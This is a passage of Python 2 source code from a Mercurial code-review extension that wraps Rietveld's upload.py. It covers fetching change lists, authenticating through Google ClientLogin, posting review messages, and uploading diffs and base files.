typecheck(data, str)
d = fix_json(json.loads(data))
except:
ui.warn("JSONGet %s: %s\n" % (path, ExceptionDetail()))
return None
return d
# Clean up json parser output to match our expectations:
# * all strings are UTF-8-encoded str, not unicode.
# * missing fields are missing, not None,
# so that d.get("foo", defaultvalue) works.
def fix_json(x):
if type(x) in [str, int, float, bool, type(None)]:
pass
elif type(x) is unicode:
x = x.encode("utf-8")
elif type(x) is list:
for i in range(len(x)):
x[i] = fix_json(x[i])
elif type(x) is dict:
todel = []
for k in x:
if x[k] is None:
todel.append(k)
else:
x[k] = fix_json(x[k])
for k in todel:
del x[k]
else:
raise hg_util.Abort("unknown type " + str(type(x)) + " in fix_json")
if type(x) is str:
x = x.replace('\r\n', '\n')
return x
def IsRietveldSubmitted(ui, clname, hex):
dict = JSONGet(ui, "/api/" + clname + "?messages=true")
if dict is None:
return False
for msg in dict.get("messages", []):
text = msg.get("text", "")
m = re.match('\*\*\* Submitted as [^*]*?([0-9a-f]+) \*\*\*', text)
if m is not None and len(m.group(1)) >= 8 and hex.startswith(m.group(1)):
return True
return False
def IsRietveldMailed(cl):
for msg in cl.dict.get("messages", []):
if msg.get("text", "").find("I'd like you to review this change") >= 0:
return True
return False
def DownloadCL(ui, repo, clname):
set_status("downloading CL " + clname)
cl, err = LoadCL(ui, repo, clname, web=True)
if err != "":
return None, None, None, "error loading CL %s: %s" % (clname, err)
# Find most recent diff
diffs = cl.dict.get("patchsets", [])
if not diffs:
return None, None, None, "CL has no patch sets"
patchid = diffs[-1]
patchset = JSONGet(ui, "/api/" + clname + "/" + str(patchid))
if patchset is None:
return None, None, None, "error loading CL patchset %s/%d" % (clname, patchid)
if patchset.get("patchset", 0) != patchid:
return None, None, None, "malformed patchset information"
vers = ""
msg = patchset.get("message", "").split()
if len(msg) >= 3 and msg[0] == "diff" and msg[1] == "-r":
vers = msg[2]
diff = "/download/issue" + clname + "_" + str(patchid) + ".diff"
diffdata = MySend(diff, force_auth=False)
# Print warning if email is not in CONTRIBUTORS file.
email = cl.dict.get("owner_email", "")
if not email:
return None, None, None, "cannot find owner for %s" % (clname)
him = FindContributor(ui, repo, email)
me = FindContributor(ui, repo, None)
if him == me:
cl.mailed = IsRietveldMailed(cl)
else:
cl.copied_from = email
return cl, vers, diffdata, ""
def MySend(request_path, payload=None,
content_type="application/octet-stream",
timeout=None, force_auth=True,
**kwargs):
"""Run MySend1 maybe twice, because Rietveld is unreliable."""
try:
return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
except Exception, e:
if type(e) != urllib2.HTTPError or e.code != 500: # only retry on HTTP 500 error
raise
print >>sys.stderr, "Loading "+request_path+": "+ExceptionDetail()+"; trying again in 2 seconds."
time.sleep(2)
return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
# Like upload.py Send but only authenticates when the
# redirect is to www.google.com/accounts. This keeps
# unnecessary redirects from happening during testing.
def MySend1(request_path, payload=None,
content_type="application/octet-stream",
timeout=None, force_auth=True,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
global rpc
if rpc == None:
rpc = GetRpcServer(upload_options)
self = rpc
if not self.authenticated and force_auth:
self._Authenticate()
if request_path is None:
return
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "http://%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
try:
f = self.opener.open(req)
response = f.read()
f.close()
# Translate \r\n into \n, because Rietveld doesn't.
response = response.replace('\r\n', '\n')
# who knows what urllib will give us
if type(response) == unicode:
response = response.encode("utf-8")
typecheck(response, str)
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401:
self._Authenticate()
elif e.code == 302:
loc = e.info()["location"]
if not loc.startswith('https://www.google.com/a') or loc.find('/ServiceLogin') < 0:
return ''
self._Authenticate()
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
def GetForm(url):
f = FormParser()
f.feed(ustr(MySend(url))) # f.feed wants unicode
f.close()
# convert back to utf-8 to restore sanity
m = {}
for k,v in f.map.items():
m[k.encode("utf-8")] = v.replace("\r\n", "\n").encode("utf-8")
return m
def EditDesc(issue, subject=None, desc=None, reviewers=None, cc=None, closed=False, private=False):
set_status("uploading change to description")
form_fields = GetForm("/" + issue + "/edit")
if subject is not None:
form_fields['subject'] = subject
if desc is not None:
form_fields['description'] = desc
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if closed:
form_fields['closed'] = "checked"
if private:
form_fields['private'] = "checked"
ctype, body = EncodeMultipartFormData(form_fields.items(), [])
response = MySend("/" + issue + "/edit", body, content_type=ctype)
if response != "":
print >>sys.stderr, "Error editing description:\n" + "Sent form: \n", form_fields, "\n", response
sys.exit(2)
def PostMessage(ui, issue, message, reviewers=None, cc=None, send_mail=True, subject=None):
set_status("uploading message")
form_fields = GetForm("/" + issue + "/publish")
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if send_mail:
form_fields['send_mail'] = "checked"
else:
del form_fields['send_mail']
if subject is not None:
form_fields['subject'] = subject
form_fields['message'] = message
form_fields['message_only'] = '1' # Don't include draft comments
if reviewers is not None or cc is not None:
form_fields['message_only'] = '' # Must set '' in order to override cc/reviewer
ctype = "applications/x-www-form-urlencoded"
body = urllib.urlencode(form_fields)
response = MySend("/" + issue + "/publish", body, content_type=ctype)
if response != "":
print response
sys.exit(2)
class opt(object):
pass
def RietveldSetup(ui, repo):
global force_google_account
global rpc
global server
global server_url_base
global upload_options
global verbosity
if not ui.verbose:
verbosity = 0
# Config options.
x = ui.config("codereview", "server")
if x is not None:
server = x
# TODO(rsc): Take from ui.username?
email = None
x = ui.config("codereview", "email")
if x is not None:
email = x
server_url_base = "http://" + server + "/"
testing = ui.config("codereview", "testing")
force_google_account = ui.configbool("codereview", "force_google_account", False)
upload_options = opt()
upload_options.email = email
upload_options.host = None
upload_options.verbose = 0
upload_options.description = None
upload_options.description_file = None
upload_options.reviewers = None
upload_options.cc = None
upload_options.message = None
upload_options.issue = None
upload_options.download_base = False
upload_options.revision = None
upload_options.send_mail = False
upload_options.vcs = None
upload_options.server = server
upload_options.save_cookies = True
if testing:
upload_options.save_cookies = False
upload_options.email = "test@example.com"
rpc = None
global releaseBranch
tags = repo.branchtags().keys()
if 'release-branch.r100' in tags:
# NOTE(rsc): This tags.sort is going to get the wrong
# answer when comparing release-branch.r99 with
# release-branch.r100. If we do ten releases a year
# that gives us 4 years before we have to worry about this.
raise hg_util.Abort('tags.sort needs to be fixed for release-branch.r100')
tags.sort()
for t in tags:
if t.startswith('release-branch.'):
releaseBranch = t
#######################################################################
# http://codereview.appspot.com/static/upload.py, heavily edited.
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for uploading diffs from a version control system to the codereview app.
Usage summary: upload.py [options] [-- diff_options]
Diff options are passed to the diff command of the underlying system.
Supported version control systems:
Git
Mercurial
Subversion
It is important for Git/Mercurial users to specify a tree/node/branch to diff
against by using the '--rev' option.
"""
# This code is derived from appcfg.py in the App Engine SDK (open source),
# and from ASPN recipe #146306.
import cookielib
import getpass
import logging
import mimetypes
import optparse
import os
import re
import socket
import subprocess
import sys
import urllib
import urllib2
import urlparse
# The md5 module was deprecated in Python 2.5.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
import readline
except ImportError:
pass
# The logging verbosity:
# 0: Errors only.
# 1: Status messages.
# 2: Info logs.
# 3: Debug logs.
verbosity = 1
# Max size of patch or base file.
MAX_UPLOAD_SIZE = 900 * 1024
# whitelist for non-binary filetypes which do not start with "text/"
# .mm (Objective-C) shows up as application/x-freemind on my Linux box.
TEXT_MIMETYPES = [
'application/javascript',
'application/x-javascript',
'application/x-freemind'
]
def GetEmail(prompt):
"""Prompts the user for their email address and returns it.
The last used email address is saved to a file and offered up as a suggestion
to the user. If the user presses enter without typing in anything the last
used email address is used. If the user enters a new address, it is saved
for next time we prompt.
"""
last_email_file_name = os.path.expanduser("~/.last_codereview_email_address")
last_email = ""
if os.path.exists(last_email_file_name):
try:
last_email_file = open(last_email_file_name, "r")
last_email = last_email_file.readline().strip("\n")
last_email_file.close()
prompt += " [%s]" % last_email
except IOError, e:
pass
email = raw_input(prompt + ": ").strip()
if email:
try:
last_email_file = open(last_email_file_name, "w")
last_email_file.write(email)
last_email_file.close()
except IOError, e:
pass
else:
email = last_email
return email
def StatusUpdate(msg):
"""Print a status message to stdout.
If 'verbosity' is greater than 0, print the message.
Args:
msg: The string to print.
"""
if verbosity > 0:
print msg
def ErrorExit(msg):
"""Print an error message to stderr and exit."""
print >>sys.stderr, msg
sys.exit(1)
class ClientLoginError(urllib2.HTTPError):
"""Raised to indicate there was an error authenticating with ClientLogin."""
def __init__(self, url, code, msg, headers, args):
urllib2.HTTPError.__init__(self, url, code, msg, headers, None)
self.args = args
self.reason = args["Error"]
class AbstractRpcServer(object):
"""Provides a common interface for a simple RPC server."""
def __init__(self, host, auth_function, host_override=None, extra_headers={}, save_cookies=False):
"""Creates a new HttpRpcServer.
Args:
host: The host to send requests to.
auth_function: A function that takes no arguments and returns an
(email, password) tuple when called. Will be called if authentication
is required.
host_override: The host header to send to the server (defaults to host).
extra_headers: A dict of extra headers to append to every request.
save_cookies: If True, save the authentication cookies to local disk.
If False, use an in-memory cookiejar instead. Subclasses must
implement this functionality. Defaults to False.
"""
self.host = host
self.host_override = host_override
self.auth_function = auth_function
self.authenticated = False
self.extra_headers = extra_headers
self.save_cookies = save_cookies
self.opener = self._GetOpener()
if self.host_override:
logging.info("Server: %s; Host: %s", self.host, self.host_override)
else:
logging.info("Server: %s", self.host)
def _GetOpener(self):
"""Returns an OpenerDirector for making HTTP requests.
Returns:
A urllib2.OpenerDirector object.
"""
raise NotImplementedError()
def _CreateRequest(self, url, data=None):
"""Creates a new urllib request."""
logging.debug("Creating request for: '%s' with payload:\n%s", url, data)
req = urllib2.Request(url, data=data)
if self.host_override:
req.add_header("Host", self.host_override)
for key, value in self.extra_headers.iteritems():
req.add_header(key, value)
return req
def _GetAuthToken(self, email, password):
"""Uses ClientLogin to authenticate the user, returning an auth token.
Args:
email: The user's email address
password: The user's password
Raises:
ClientLoginError: If there was an error authenticating with ClientLogin.
HTTPError: If there was some other form of HTTP error.
Returns:
The authentication token returned by ClientLogin.
"""
account_type = "GOOGLE"
if self.host.endswith(".google.com") and not force_google_account:
# Needed for use inside Google.
account_type = "HOSTED"
req = self._CreateRequest(
url="https://www.google.com/accounts/ClientLogin",
data=urllib.urlencode({
"Email": email,
"Passwd": password,
"service": "ah",
"source": "rietveld-codereview-upload",
"accountType": account_type,
}),
)
try:
response = self.opener.open(req)
response_body = response.read()
response_dict = dict(x.split("=") for x in response_body.split("\n") if x)
return response_dict["Auth"]
except urllib2.HTTPError, e:
if e.code == 403:
body = e.read()
response_dict = dict(x.split("=", 1) for x in body.split("\n") if x)
raise ClientLoginError(req.get_full_url(), e.code, e.msg, e.headers, response_dict)
else:
raise
def _GetAuthCookie(self, auth_token):
"""Fetches authentication cookies for an authentication token.
Args:
auth_token: The authentication token returned by ClientLogin.
Raises:
HTTPError: If there was an error fetching the authentication cookies.
"""
# This is a dummy value to allow us to identify when we're successful.
continue_location = "http://localhost/"
args = {"continue": continue_location, "auth": auth_token}
req = self._CreateRequest("http://%s/_ah/login?%s" % (self.host, urllib.urlencode(args)))
try:
response = self.opener.open(req)
except urllib2.HTTPError, e:
response = e
if (response.code != 302 or
response.info()["location"] != continue_location):
raise urllib2.HTTPError(req.get_full_url(), response.code, response.msg, response.headers, response.fp)
self.authenticated = True
def _Authenticate(self):
"""Authenticates the user.
The authentication process works as follows:
1) We get a username and password from the user
2) We use ClientLogin to obtain an AUTH token for the user
(see http://code.google.com/apis/accounts/AuthForInstalledApps.html).
3) We pass the auth token to /_ah/login on the server to obtain an
authentication cookie. If login was successful, it tries to redirect
us to the URL we provided.
If we attempt to access the upload API without first obtaining an
authentication cookie, it returns a 401 response (or a 302) and
directs us to authenticate ourselves with ClientLogin.
"""
for i in range(3):
credentials = self.auth_function()
try:
auth_token = self._GetAuthToken(credentials[0], credentials[1])
except ClientLoginError, e:
if e.reason == "BadAuthentication":
print >>sys.stderr, "Invalid username or password."
continue
if e.reason == "CaptchaRequired":
print >>sys.stderr, (
"Please go to\n"
"https://www.google.com/accounts/DisplayUnlockCaptcha\n"
"and verify you are a human. Then try again.")
break
if e.reason == "NotVerified":
print >>sys.stderr, "Account not verified."
break
if e.reason == "TermsNotAgreed":
print >>sys.stderr, "User has not agreed to TOS."
break
if e.reason == "AccountDeleted":
print >>sys.stderr, "The user account has been deleted."
break
if e.reason == "AccountDisabled":
print >>sys.stderr, "The user account has been disabled."
break
if e.reason == "ServiceDisabled":
print >>sys.stderr, "The user's access to the service has been disabled."
break
if e.reason == "ServiceUnavailable":
print >>sys.stderr, "The service is not available; try again later."
break
raise
self._GetAuthCookie(auth_token)
return
def Send(self, request_path, payload=None,
content_type="application/octet-stream",
timeout=None,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
if not self.authenticated:
self._Authenticate()
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "http://%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
try:
f = self.opener.open(req)
response = f.read()
f.close()
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401 or e.code == 302:
self._Authenticate()
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
class HttpRpcServer(AbstractRpcServer):
"""Provides a simplified RPC-style interface for HTTP requests."""
def _Authenticate(self):
"""Save the cookie jar after authentication."""
super(HttpRpcServer, self)._Authenticate()
if self.save_cookies:
StatusUpdate("Saving authentication cookies to %s" % self.cookie_file)
self.cookie_jar.save()
def _GetOpener(self):
"""Returns an OpenerDirector that supports cookies and ignores redirects.
Returns:
A urllib2.OpenerDirector object.
"""
opener = urllib2.OpenerDirector()
opener.add_handler(urllib2.ProxyHandler())
opener.add_handler(urllib2.UnknownHandler())
opener.add_handler(urllib2.HTTPHandler())
opener.add_handler(urllib2.HTTPDefaultErrorHandler())
opener.add_handler(urllib2.HTTPSHandler())
opener.add_handler(urllib2.HTTPErrorProcessor())
if self.save_cookies:
self.cookie_file = os.path.expanduser("~/.codereview_upload_cookies_" + server)
self.cookie_jar = cookielib.MozillaCookieJar(self.cookie_file)
if os.path.exists(self.cookie_file):
try:
self.cookie_jar.load()
self.authenticated = True
StatusUpdate("Loaded authentication cookies from %s" % self.cookie_file)
except (cookielib.LoadError, IOError):
# Failed to load cookies - just ignore them.
pass
else:
# Create an empty cookie file with mode 600
fd = os.open(self.cookie_file, os.O_CREAT, 0600)
os.close(fd)
# Always chmod the cookie file
os.chmod(self.cookie_file, 0600)
else:
# Don't save cookies across runs of update.py.
self.cookie_jar = cookielib.CookieJar()
opener.add_handler(urllib2.HTTPCookieProcessor(self.cookie_jar))
return opener
def GetRpcServer(options):
"""Returns an instance of an AbstractRpcServer.
Returns:
A new AbstractRpcServer, on which RPC calls can be made.
"""
rpc_server_class = HttpRpcServer
def GetUserCredentials():
"""Prompts the user for a username and password."""
# Disable status prints so they don't obscure the password prompt.
global global_status
st = global_status
global_status = None
email = options.email
if email is None:
email = GetEmail("Email (login for uploading to %s)" % options.server)
password = getpass.getpass("Password for %s: " % email)
# Put status back.
global_status = st
return (email, password)
# If this is the dev_appserver, use fake authentication.
host = (options.host or options.server).lower()
if host == "localhost" or host.startswith("localhost:"):
email = options.email
if email is None:
email = "test@example.com"
logging.info("Using debug user %s. Override with --email" % email)
server = rpc_server_class(
options.server,
lambda: (email, "password"),
host_override=options.host,
extra_headers={"Cookie": 'dev_appserver_login="%s:False"' % email},
save_cookies=options.save_cookies)
# Don't try to talk to ClientLogin.
server.authenticated = True
return server
return rpc_server_class(options.server, GetUserCredentials,
host_override=options.host, save_cookies=options.save_cookies)
def EncodeMultipartFormData(fields, files):
"""Encode form fields for multipart/form-data.
Args:
fields: A sequence of (name, value) elements for regular form fields.
files: A sequence of (name, filename, value) elements for data to be
uploaded as files.
Returns:
(content_type, body) ready for httplib.HTTP instance.
Source:
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
"""
BOUNDARY = '-M-A-G-I-C---B-O-U-N-D-A-R-Y-'
CRLF = '\r\n'
lines = []
for (key, value) in fields:
typecheck(key, str)
typecheck(value, str)
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"' % key)
lines.append('')
lines.append(value)
for (key, filename, value) in files:
typecheck(key, str)
typecheck(filename, str)
typecheck(value, str)
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
lines.append('Content-Type: %s' % GetContentType(filename))
lines.append('')
lines.append(value)
lines.append('--' + BOUNDARY + '--')
lines.append('')
body = CRLF.join(lines)
content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
return content_type, body
def GetContentType(filename):
"""Helper to guess the content-type from the filename."""
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
# Use a shell for subcommands on Windows to get a PATH search.
use_shell = sys.platform.startswith("win")
def RunShellWithReturnCode(command, print_output=False,
universal_newlines=True, env=os.environ):
"""Executes a command and returns the output from stdout and the return code.
Args:
command: Command to execute.
print_output: If True, the output is printed to stdout.
If False, both stdout and stderr are ignored.
universal_newlines: Use universal_newlines flag (default: True).
Returns:
Tuple (output, return code)
"""
logging.info("Running %s", command)
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=use_shell, universal_newlines=universal_newlines, env=env)
if print_output:
output_array = []
while True:
line = p.stdout.readline()
if not line:
break
print line.strip("\n")
output_array.append(line)
output = "".join(output_array)
else:
output = p.stdout.read()
p.wait()
errout = p.stderr.read()
if print_output and errout:
print >>sys.stderr, errout
p.stdout.close()
p.stderr.close()
return output, p.returncode
def RunShell(command, silent_ok=False, universal_newlines=True,
print_output=False, env=os.environ):
data, retcode = RunShellWithReturnCode(command, print_output, universal_newlines, env)
if retcode:
ErrorExit("Got error status from %s:\n%s" % (command, data))
if not silent_ok and not data:
ErrorExit("No output from %s" % command)
return data
class VersionControlSystem(object):
"""Abstract base class providing an interface to the VCS."""
def __init__(self, options):
"""Constructor.
Args:
options: Command line options.
"""
self.options = options
def GenerateDiff(self, args):
"""Return the current diff as a string.
Args:
args: Extra arguments to pass to the diff command.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def CheckForUnknownFiles(self):
"""Show an "are you sure?" prompt if there are unknown files."""
unknown_files = self.GetUnknownFiles()
if unknown_files:
print "The following files are not added to version control:"
for line in unknown_files:
print line
prompt = "Are you sure to continue?(y/N) "
answer = raw_input(prompt).strip()
if answer != "y":
ErrorExit("User aborted")
def GetBaseFile(self, filename):
"""Get the content of the upstream version of a file.
Returns:
A tuple (base_content, new_content, is_binary, status)
base_content: The contents of the base file.
new_content: For text files, this is empty. For binary files, this is
the contents of the new file, since the diff output won't contain
information to reconstruct the current file.
is_binary: True iff the file is binary.
status: The status of the file.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetBaseFiles(self, diff):
"""Helper that calls GetBase file for each file in the patch.
Returns:
A dictionary that maps from filename to GetBaseFile's tuple. Filenames
are retrieved based on lines that start with "Index:" or
"Property changes on:".
"""
files = {}
for line in diff.splitlines(True):
if line.startswith('Index:') or line.startswith('Property changes on:'):
unused, filename = line.split(':', 1)
# On Windows if a file has property changes its filename uses '\'
# instead of '/'.
filename = to_slash(filename.strip())
files[filename] = self.GetBaseFile(filename)
return files
def UploadBaseFiles(self, issue, rpc_server, patch_list, patchset, options,
files):
"""Uploads the base files (and if necessary, the current ones as well)."""
def UploadFile(filename, file_id, content, is_binary, status, is_base):
"""Uploads a file to the server."""
set_status("uploading " + filename)
file_too_large = False
if is_base:
type = "base"
else:
type = "current"
if len(content) > MAX_UPLOAD_SIZE:
print ("Not uploading the %s file for %s because it's too large." %
(type, filename))
file_too_large = True
content = ""
checksum = md5(content).hexdigest()
if options.verbose > 0 and not file_too_large:
print "Uploading %s file for %s" % (type, filename)
url = "/%d/upload_content/%d/%d" % (int(issue), int(patchset), file_id)
form_fields = [
("filename", filename),
("status", status),
("checksum", checksum),
("is_binary", str(is_binary)),
("is_current", str(not is_base)),
]
if file_too_large:
form_fields.append(("file_too_large", "1"))
if options.email:
form_fields.append(("user", options.email))
ctype, body = EncodeMultipartFormData(form_fields, [("data", filename, content)])
response_body = rpc_server.Send(url, body, content_type=ctype)
if not response_body.startswith("OK"):
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
# Don't want to spawn too many threads, nor do we want to
# hit Rietveld too hard, or it will start serving 500 errors.
# When 8 works, it's no better than 4, and sometimes 8 is
# too many for Rietveld to handle.
MAX_PARALLEL_UPLOADS = 4
sema = threading.BoundedSemaphore(MAX_PARALLEL_UPLOADS)
upload_threads = []
finished_upload_threads = []
class UploadFileThread(threading.Thread):
def __init__(self, args):
threading.Thread.__init__(self)
self.args = args
def run(self):
UploadFile(*self.args)
finished_upload_threads.append(self)
sema.release()
def StartUploadFile(*args):
sema.acquire()
while len(finished_upload_threads) > 0:
t = finished_upload_threads.pop()
upload_threads.remove(t)
t.join()
t = UploadFileThread(args)
upload_threads.append(t)
t.start()
def WaitForUploads():
for t in upload_threads:
t.join()
patches = dict()
[patches.setdefault(v, k) for k, v in patch_list]
for filename in patches.keys():
base_content, new_content, is_binary, status = files[filename]
file_id_str = patches.get(filename)
if file_id_str.find("nobase") != -1:
base_content = None
file_id_str = file_id_str[file_id_str.rfind("_") + 1:]
file_id = int(file_id_str)
if base_content != None:
StartUploadFile(filename, file_id, base_content, is_binary, status, True)
if new_content != None:
StartUploadFile(filename, file_id, new_content, is_binary, status, False)
WaitForUploads()
def IsImage(self, filename):
"""Returns true if the filename has an image extension."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False
return mimetype.startswith("image/")
def IsBinary(self, filename):
"""Returns true if the guessed mimetyped isnt't in text group."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False # e.g. README, "real" binaries usually have an extension
# special case for text files which don't start with text/
if mimetype in TEXT_MIMETYPES:
return False
return not mimetype.startswith("text/")
class FakeMercurialUI(object):
def __init__(self):
self.quiet = True
self.output = ''
def write(self, *args, **opts):
self.output += ' '.join(args)
def copy(self):
return self
def status(self, *args, **opts):
pass
def readconfig(self, *args, **opts):
pass
def expandpath(self, *args, **opts):
return global_ui.expandpath(*args, **opts)
def configitems(self, *args, **opts):
return global_ui.configitems(*args, **opts)
def config(self, *args, **opts):
return global_ui.config(*args, **opts)
use_hg_shell = False # set to True to shell out to hg always; slower
class MercurialVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Mercurial."""
def __init__(self, options, ui, repo):
super(MercurialVCS, self).__init__(options)
self.ui = ui
self.repo = repo
self.status = None
# Absolute path to repository (we can be in a subdir)
self.repo_dir = os.path.normpath(repo.root)
# Compute the subdir
cwd = os.path.normpath(os.getcwd())
assert cwd.startswith(self.repo_dir)
self.subdir = cwd[len(self.repo_dir):].lstrip(r"\/")
if self.options.revision:
self.base_rev = self.options.revision
else:
mqparent, err = RunShellWithReturnCode(['hg', 'log', '--rev', 'qparent', '--template={node}'])
if not err and mqparent != "":
self.base_rev = mqparent
else:
self.base_rev = RunShell(["hg", "parents", "-q"]).split(':')[1].strip()
def _GetRelPath(self, filename):
"""Get relative path of a file according to the current directory,
given its logical path in the repo."""
assert filename.startswith(self.subdir), (filename, self.subdir)
return filename[len(self.subdir):].lstrip(r"\/")
def GenerateDiff(self, extra_args):
# If no file specified, restrict to the current subdir
extra_args = extra_args or ["."]
cmd = ["hg", "diff", "--git", "-r", self.base_rev] + extra_args
data = RunShell(cmd, silent_ok=True)
svndiff = []
filecount = 0
for line in data.splitlines():
m = re.match("diff --git a/(\S+) b/(\S+)", line)
if m:
# Modify line to make it look like as it comes from svn diff.
# With this modification no changes on the server side are required
# to make upload.py work with Mercurial repos.
# NOTE: for proper handling of moved/copied files, we have to use
# the second filename.
filename = m.group(2)
svndiff.append("Index: %s" % filename)
svndiff.append("=" * 67)
filecount += 1
logging.info(line)
else:
svndiff.append(line)
if not filecount:
ErrorExit("No valid patches found in output from hg diff")
return "\n".join(svndiff) + "\n"
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
args = []
status = RunShell(["hg", "status", "--rev", self.base_rev, "-u", "."],
silent_ok=True)
unknown_files = []
for line in status.splitlines():
st, fn = line.split(" ", 1)
if st == "?":
unknown_files.append(fn)
return unknown_files
def get_hg_status(self, rev, path):
# We'd like to use 'hg status -C path', but that is buggy
# (see http://mercurial.selenic.com/bts/issue3023).
# Instead, run 'hg status -C' without a path
# and skim the output for the path we want.
if self.status is None:
if use_hg_shell:
out = RunShell(["hg", "status", "-C", "--rev", rev])
else:
fui = FakeMercurialUI()
ret = hg_commands.status(fui, self.repo, *[], **{'rev': [rev], 'copies': True})
if ret:
raise hg_util.Abort(ret)
out = fui.output
self.status = out.splitlines()
for i in range(len(self.status)):
# line is
# A path
# M path
# etc
line = to_slash(self.status[i])
if line[2:] == path:
if i+1 < len(self.status) and self.status[i+1][:2] == ' ':
return self.status[i:i+2]
return self.status[i:i+1]
raise hg_util.Abort("no status for " + path)
def GetBaseFile(self, filename):
set_status("inspecting " + filename)
# "hg status" and "hg cat" both take a path relative to the current subdir
# rather than to the repo root, but "hg diff" has given us the full path
# to the repo root.
base_content = ""
new_content = None
is_binary = False
oldrelpath = relpath = self._GetRelPath(filename)
out = self.get_hg_status(self.base_rev, relpath)
status, what = out[0].split(' ', 1)
if len(out) > 1 and status == "A" and what == relpath:
oldrelpath = out[1].strip()
status = "M"
if ":" in self.base_rev:
base_rev = self.base_rev.split(":", 1)[0]
else:
base_rev = self.base_rev
if status != "A":
if use_hg_shell:
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath], silent_ok=True)
else:
base_content = str(self.repo[base_rev][oldrelpath].data())
is_binary = "\0" in base_content # Mercurial's heuristic
if status != "R":
new_content = open(relpath, "rb").read()
is_binary = is_binary or "\0" in new_content
if is_binary and base_content and use_hg_shell:
# Fetch again without converting newlines
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
silent_ok=True, universal_newlines=False)
if not is_binary or not self.IsImage(relpath):
new_content = None
return base_content, new_content, is_binary, status
# NOTE: The SplitPatch function is duplicated in engine.py, keep them in sync.
def SplitPatch(data):
"""Splits a patch into separate pieces for each file.
Args:
data: A string containing the output of svn diff.
Returns:
A list of 2-tuple (filename, text) where text is the svn diff output
pertaining to filename.
"""
patches = []
filename = None
diff = []
for line in data.splitlines(True):
new_filename = None
if line.startswith('Index:'):
unused, new_filename = line.split(':', 1)
new_filename = new_filename.strip()
elif line.startswith('Property changes on:'):
unused, temp_filename = line.split(':', 1)
# When a file is modified, paths use '/' between directories, however
# when a property is modified '\' is used on Windows. Make them the same
# otherwise the file shows up twice.
temp_filename = to_slash(temp_filename.strip())
if temp_filename != filename:
# File has property changes but no modifications, create a new diff.
new_filename = temp_filename
if new_filename:
if filename and diff:
patches.append((filename, ''.join(diff)))
filename = new_filename
diff = [line]
continue
if diff is not None:
diff.append(line)
if filename and diff:
patches.append((filename, ''.join(diff)))
return patches
def UploadSeparatePatches(issue, rpc_server, patchset, data, options):
"""Uploads a separate patch for each file in the diff output.
Returns a list of [patch_key, filename] for each file.
"""
patches = SplitPatch(data)
rv = []
for patch in patches:
set_status("uploading patch for " + patch[0])
if len(patch[1]) > MAX_UPLOAD_SIZE:
print ("Not uploading the patch for " + patch[0] +
" because the file is too large.")
continue
form_fields = [("filename", patch[0])]
if not options.download_base:
form_fields.append(("content_upload", "1"))
files = [("data", "data.diff", patch[1])]
ctype, body = EncodeMultipartFormData(form_fields, files)
url = "/%d/upload_patch/%d" % (int(issue), int(patchset))
print "Uploading patch for " + patch[0]
response_body = rpc_server.Send(url, body, content_type=ctype)
lines = response_body.splitlines()
if not lines or lines[0] != "OK":
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
rv.append([lines[1], patch[0]])
return rv
codereview: Initialize "found" in codereview.py.
